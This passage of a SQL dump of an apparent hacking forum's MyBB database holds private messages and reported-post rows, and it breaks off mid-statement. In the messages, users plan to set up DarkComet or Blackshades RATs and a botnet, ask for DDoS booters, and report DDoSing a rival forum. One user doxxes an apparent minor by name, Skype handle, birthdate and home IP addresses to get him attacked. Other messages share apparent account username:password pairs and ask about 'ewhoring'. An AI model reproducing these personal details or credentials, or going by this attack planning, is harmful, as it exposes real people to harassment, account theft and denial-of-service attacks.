INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4035', '160', '5', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Hey Guys', '0', '[quote=\'Timmy\'] [quote=\'Jacob\'] [quote=\'Timmy\'] [quote=\'Jacob\'] Do you want to help me set up the RAT, and build a BotNet? [/quote] Sure what RAT are you using? [/quote] Any, DarkComet Or Black shades [/quote] Lets use darkcomet i\'m more use to it :D What version do you have? [/quote] Latest lol? The shit I can download from L33t Hacking Can you add me on skype? J.acob.C', '1352220944', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4037', '160', '62', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Hey', '0', 'Hey, just asking, do you have any good DDosers that work? Jays booter is a piece of shit, doesnt do anything. ', '1352228566', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4044', '324', '82', '324', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'mc', '0', 'jackbraun312:jeffie PROOF: http://puu.sh/1nmDO If you want to vouch go ahead, it doesn\'t matter. :p', '1352262914', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4046', '324', '228', '324', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'MC', '0', 'thesamlkay123:samlkay567 Proof : http://puu.sh/1nmHS', '1352263065', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4050', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS service', '0', '[quote=\'t3h jok3r\'] I need you to hit anarchyforums on their cloudflare IP. Doesn\'t matter how long but at least 4 mins would be highly appreciated. Do it anytime when you are free. [/quote] fuck so sorry i didnt see this sooner, I\'m hitting it now.', '1352342101', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4059', '323', '1', '323', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hello', '0', 'i am very happy to be a member of this hacking site and i never regret to be a member. as i look forward to contribute educationally in the nearest future. i love all the hard work you\'ve been adding to the forum and God will keep providing you with an uncomparable knowledge. but please i would ask you of a favor. i really want to go into Ewhoring, but i have been having problems with pics and vids. i would be very grateful if you can help me out with it. hope to hear from you. thanks.', '1352478495', '0', '1', '0', '0', '1', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4063', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Junk', '0', '[quote=\'t3h jok3r\'] Hey, I noticed you junked this thread. http://l33thacking.net/thread-1232.html I scanned it on virustotal and used sandboxie on it and it seems legit. [/quote] I didn\'t mean to. I was on mobile I have to fix it asap. My phone derps out sometimes and just goes nuts. I dropped it and the touch screen is messed.', '1352493731', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4065', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Junk', '0', '[quote=\'t3h jok3r\'] Hey, I noticed you junked this thread. http://l33thacking.net/thread-1232.html I scanned it on virustotal and used sandboxie on it and it seems legit. [/quote] Fixed.', '1352493834', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4068', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'DDoS', '0', 'Skype: junaidrafi101 Name: Junaid Rafi Age: March 6, 1999 IP: 173.34.86.248 Boot this guy offline please! :D', '1352497178', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4070', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'DDoS #2', '0', 'Another possible IP of his: 99.228.45.133 ISP: CPEbcc8100a5a85-CMbcc8100a5a82.cpe.net.cable.rogers.com ', '1352497534', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4074', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] Skype: junaidrafi101 Name: Junaid Rafi Age: March 6, 1999 IP: 173.34.86.248 Boot this guy offline please! :D [/quote] Forwarded to my friend who is a good DDoSer, not talking about Gron. [/quote] Thanks. Is it sirchamp?? :p Bitch scammed me $30. ', '1352517932', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4078', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] Skype: junaidrafi101 Name: Junaid Rafi Age: March 6, 1999 IP: 173.34.86.248 Boot this guy offline please! :D [/quote] Forwarded to my friend who is a good DDoSer, not talking about Gron. [/quote] Thanks. Is it sirchamp?? :p Bitch scammed me $30. [/quote] No and when did he scam you? [/quote] 2 days ago. I just didn\'t really care because I was busy with other things. ', '1352550641', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4083', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] Skype: junaidrafi101 Name: Junaid Rafi Age: March 6, 1999 IP: 173.34.86.248 Boot this guy offline please! :D [/quote] Forwarded to my friend who is a good DDoSer, not talking about Gron. [/quote] Thanks. Is it sirchamp?? :p Bitch scammed me $30. [/quote] No and when did he scam you? [/quote] 2 days ago. I just didn\'t really care because I was busy with other things. [/quote] Can you provide me proof so I can ban him? [/quote] He isn\'t registered on this site. He is on a different forum and he got banned on it for scamming me. But I want him to learn his lesson by getting DDoSed', '1352579726', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4086', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] Skype: junaidrafi101 Name: Junaid Rafi Age: March 6, 1999 IP: 173.34.86.248 Boot this guy offline please! :D [/quote] Forwarded to my friend who is a good DDoSer, not talking about Gron. [/quote] Thanks. Is it sirchamp?? :p Bitch scammed me $30. [/quote] No and when did he scam you? [/quote] 2 days ago. I just didn\'t really care because I was busy with other things. [/quote] Can you provide me proof so I can ban him? [/quote] He isn\'t registered on this site. He is on a different forum and he got banned on it for scamming me. But I want him to learn his lesson by getting DDoSed [/quote] Oh OK since you have his IP, why not swat him? [/quote] Swat as in? If you mean DDoS him by myself, that\'s the thing I don\'t know any good DDoSing tools.', '1352583405', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4089', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'ps3?', '0', 'hey do have ps3 if you do add me: xPRO_CALIBERx', '1352595963', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4092', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Online Booters?', '0', 'Hey can you give me a link to an online booter so I can attack someone\'s IP? :p ', '1352603770', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4095', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] Hey can you give me a link to an online booter so I can attack someone\'s IP? :p [/quote] Free or Paid? [/quote] If there\'s any free working booters.. Yeah I would like that. If it\'s paid.. Then :/ I don\'t got the money to afford one.', '1352603955', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4098', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] Hey can you give me a link to an online booter so I can attack someone\'s IP? :p [/quote] Free or Paid? [/quote] If there\'s any free working booters.. Yeah I would like that. If it\'s paid.. Then :/ I don\'t got the money to afford one. [/quote] No free one that I\'m aware of. Maybe we can make a online booter for LH :D [/quote] We as in you. :p', '1352604174', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4101', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: ps3?', '0', '[quote=\'t3h jok3r\'] [quote=\'XxTREYZxX\'] hey do have ps3 if you do add me: xPRO_CALIBERx [/quote] I don\'t have a PSN id due to security reasons and I\'m not into gaming that much sorry :D [/quote] all guds', '1352617130', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4103', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] Hey can you give me a link to an online booter so I can attack someone\'s IP? :p [/quote] Free or Paid? [/quote] If there\'s any free working booters.. Yeah I would like that. If it\'s paid.. Then :/ I don\'t got the money to afford one. [/quote] No free one that I\'m aware of. Maybe we can make a online booter for LH :D [/quote] We as in you. :p [/quote] Well I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking. [/quote] Sure. ', '1352647880', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4107', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] Hey can you give me a link to an online booter so I can attack someone\'s IP? :p [/quote] Free or Paid? [/quote] If there\'s any free working booters.. Yeah I would like that. If it\'s paid.. Then :/ I don\'t got the money to afford one. [/quote] No free one that I\'m aware of. Maybe we can make a online booter for LH :D [/quote] We as in you. :p [/quote] Well I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking. [/quote] Sure. [/quote] Just think of a good name then I will set it up :) [/quote] Something with L33t in it. Like iTzL33tBoot xD I don\'t know really. Your choice.', '1352661867', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4110', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] [quote=\'t3h jok3r\'] [quote=\'iTzIpod\'] Hey can you give me a link to an online booter so I can attack someone\'s IP? :p [/quote] Free or Paid? [/quote] If there\'s any free working booters.. Yeah I would like that. If it\'s paid.. Then :/ I don\'t got the money to afford one. [/quote] No free one that I\'m aware of. Maybe we can make a online booter for LH :D [/quote] We as in you. :p [/quote] Well I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking. [/quote] Sure. [/quote] Just think of a good name then I will set it up :) [/quote] Something with L33t in it. Like iTzL33tBoot xD I don\'t know really. Your choice. [/quote] I like the name lol. Do you know where to get private shells from? [/quote] I\'m not sure. Sorry. ', '1352762452', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4113', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Yo', '0', 'What\'s up? We have not talked in a long time. :P', '1352765481', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4123', '199', '199', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '1', 'I need your help', '0', 'I think I have RAT or Keylogger installed on my PC and I want it removed.', '1352783941', '0', '3', '1352805146', '1', '0', '0', '1352804642'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4124', '62', '62', '206', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Hi :)', '0', 'Hey, how re you. hope all good. I\'m new to this community and just thought if you could help me out a bit. Can you guide me please :) and also I love your signature, can you give the wings to me please :) and the font name please Thank you -Aayush', '1352801874', '0', '1', '0', '0', '0', '0', '1352820795'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4118', '82', '4', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"4\";}}', '2', 'You\'re in power', '0', 'How\'d you get Admin!??!', '1352770570', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4120', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] What\'s up? We have not talked in a long time. :P [/quote] Watching a movie then will work on LH wbu? [/quote] Watching lost and not much else atm. Doing graphics.', '1352770586', '0', '1', '0', '0', '0', '0', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_profilefields`; CREATE TABLE `mybb_profilefields` ( `fid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL DEFAULT '', `description` text NOT NULL, `disporder` smallint(5) unsigned NOT NULL DEFAULT '0', `type` text NOT NULL, `length` smallint(5) unsigned NOT NULL DEFAULT '0', `maxlength` smallint(5) unsigned NOT NULL DEFAULT '0', `required` int(1) NOT NULL DEFAULT '0', `editable` int(1) NOT NULL DEFAULT '0', `hidden` int(1) NOT NULL DEFAULT '0', `postnum` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`fid`) ) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_profilefields` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_promotionlogs`; CREATE TABLE `mybb_promotionlogs` ( `plid` int(10) unsigned NOT NULL AUTO_INCREMENT, `pid` int(10) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `oldusergroup` varchar(200) NOT NULL DEFAULT '0', `newusergroup` smallint(6) NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `type` varchar(9) NOT NULL DEFAULT 'primary', PRIMARY KEY (`plid`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_promotionlogs` WRITE; INSERT INTO `mybb_promotionlogs` (`plid`, `pid`, `uid`, `oldusergroup`, `newusergroup`, `dateline`, `type`) VALUES ('1', '1', '150', '2', '16', '1351248386', 'primary'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_promotions`; CREATE TABLE `mybb_promotions` ( `pid` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(120) NOT NULL DEFAULT '', `description` text NOT NULL, `enabled` tinyint(1) NOT NULL DEFAULT '1', `logging` tinyint(1) NOT NULL DEFAULT '0', `posts` int(11) NOT NULL DEFAULT '0', `posttype` char(2) NOT NULL DEFAULT '', `registered` int(11) NOT NULL DEFAULT '0', `registeredtype` varchar(20) NOT NULL DEFAULT '', `reputations` int(11) NOT NULL DEFAULT '0', `reputationtype` char(2) NOT NULL DEFAULT '', `referrals` int(11) NOT NULL DEFAULT '0', `referralstype` char(2) NOT NULL DEFAULT '', `requirements` varchar(200) NOT NULL DEFAULT '', `originalusergroup` varchar(120) NOT NULL DEFAULT '0', `newusergroup` smallint(5) unsigned NOT NULL DEFAULT '0', `usergrouptype` varchar(120) NOT NULL DEFAULT '0', PRIMARY KEY (`pid`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_promotions` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_reportedposts`; CREATE TABLE `mybb_reportedposts` ( `rid` int(10) unsigned NOT NULL AUTO_INCREMENT, `pid` int(10) unsigned NOT NULL DEFAULT '0', `tid` int(10) unsigned NOT NULL DEFAULT '0', `fid` int(10) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `reportstatus` int(1) NOT NULL DEFAULT '0', `reason` varchar(250) NOT NULL DEFAULT '', `dateline` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`rid`), KEY `fid` (`fid`), KEY `dateline` (`dateline`) ) ENGINE=MyISAM AUTO_INCREMENT=77 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_reportedposts` WRITE; INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('1', '3', '1', '2', '1', '1', 'test', '1339998087'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('2', '320', '128', '40', '9', '1', 'Disallowed BH', '1345120431'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('3', '507', '168', '3', '54', '1', 'Nonsense(Other)', '1345560279'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('4', '732', '163', '30', '5', '1', 'Nonsense(Other)', '1345816907'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('6', '754', '17', '8', '82', '1', 'SPAM', '1345819861'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('7', '175', '74', '12', '90', '1', 'SPAM', '1345904354'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('8', '917', '32', '16', '82', '1', 'SPAM', '1345949627'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('9', '1068', '251', '3', '1', '1', 'LQP', '1346017619'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('10', '1117', '253', '56', '67', '1', 'Nonsense(Other)', '1346076152'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('12', '1253', '191', '15', '67', '1', 'LQP', '1346187979'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('13', '1353', '288', '52', '82', '1', 'Wrong forum', '1346338192'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('14', '1359', '291', '7', '82', '1', 'SPAM', '1346350136'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('15', '1377', '297', '7', '67', '1', 'Personal info', '1346416995'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('16', '1509', '320', '34', '82', '1', 'SPAM', '1347226968'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('18', '1781', '388', '58', '7', '1', 'Wrong forum', '1347412589'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('19', '849', '212', '58', '82', '1', 'Nonsense(Other)', '1347414176'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('22', '1765', '383', '29', '5', '1', 'Rep Abuse(Repfuck this member)', '1347748713'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('27', '2540', '510', '19', '82', '1', 'Nonsense(Other)', '1348713030'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('29', '2746', '547', '15', '82', '1', 'Nonsense(Other)', '1348871254'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('30', '2867', '593', '15', '5', '1', 'Wrong forum', '1348968668'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('31', '2854', '587', '7', '10', '1', 'Wrong forum', '1348980377'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('33', '2944', '609', '58', '1', '1', 'Nonsense(Other)', '1348984763'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('34', '2907', '597', '3', '1', '1', 'Nonsense(Other)', '1348984931'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('35', '2886', '597', '3', '1', '1', 'Nonsense(Other)', '1348985304'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('36', '2201', '466', '13', '214', '1', 'Leech', '1349220232'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('37', '283', '112', '9', '82', '1', 'Personal info', '1349305592'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('38', '3408', '670', '46', '5', '1', 'Wrong forum', '1349408010'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('41', '2806', '565', '20', '214', '1', 'LQP', '1349865126'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('42', '3895', '764', '15', '5', '1', 'Nonsense(Other)', '1350005769'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('43', '4454', '845', '72', '254', '1', 'Threats', '1350124968'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('44', '4483', '851', '9', '3', '1', 'Nonsense(Other)', '1350151299'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('45', '4592', '859', '3', '8', '1', 'Wrong forum', '1350202274'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('46', '4886', '894', '21', '214', '1', 'SPAM', '1350418286'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('47', '2922', 